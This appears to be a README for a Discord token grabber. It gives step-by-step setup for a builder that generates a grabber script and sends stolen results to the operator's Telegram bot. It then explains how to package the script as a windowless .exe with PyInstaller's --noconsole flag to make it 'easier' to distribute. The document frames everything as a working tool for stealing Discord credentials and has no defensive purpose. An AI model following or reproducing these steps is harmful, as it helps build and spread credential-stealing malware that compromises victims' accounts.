- Run
start.bat
: Double-click thestart.bat
file to begin the setup process. - Paste your Bot Token: Get your bot token from @BotFather on Telegram and paste it when prompted.
- Paste your User ID: Obtain your numeric user ID from @userinfobot on Telegram and paste it when requested.
- Enter Grabber File Name: Type the desired name for your generated grabber script (e.g.,
grabber.py
). - Grabber File Created Successfully: The grabber file will be generated and saved in your DiscordTokenGrabber directory.
You can convert the Python script into a standalone executable (.exe
) file for easier distribution on Windows.
-
Install PyInstaller: Open
cmd
or PowerShell and run:pip install pyinstaller
-
Generate the Executable: Navigate to the directory where
main.py
is saved, then run:pyinstaller --onefile --noconsole main.py
--onefile
: Packages everything into a single.exe
file.--noconsole
: Prevents a console window from opening when the.exe
is run.
-
Find the Executable: The generated
.exe
file (main.exe
by default) will be located in thedist
folder within your script's directory.
- All results sended to bot tel
- Full Fast